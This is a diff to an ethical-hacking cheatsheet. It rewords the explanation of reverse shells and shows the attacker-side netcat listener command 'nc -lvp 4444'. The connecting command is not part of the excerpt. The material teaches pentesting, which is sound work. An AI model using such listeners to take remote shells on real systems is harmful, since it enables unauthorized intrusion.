dacoloma/Cheatsheets/Ethical_Hacker_Methodology.md

 ## Exploitation Basics
 ### Reverse and Bind shell
 To perform these attacks, we use the `nc` command (*netcat*).
-Reverse shell is when the target connects to the attacker like this :
+In reverse shell, the attacker sets up a listener on a specific port and the target connects his machine to the attacker's like this :
 ```bash
 # Attacker's machine
 nc -lvp 4444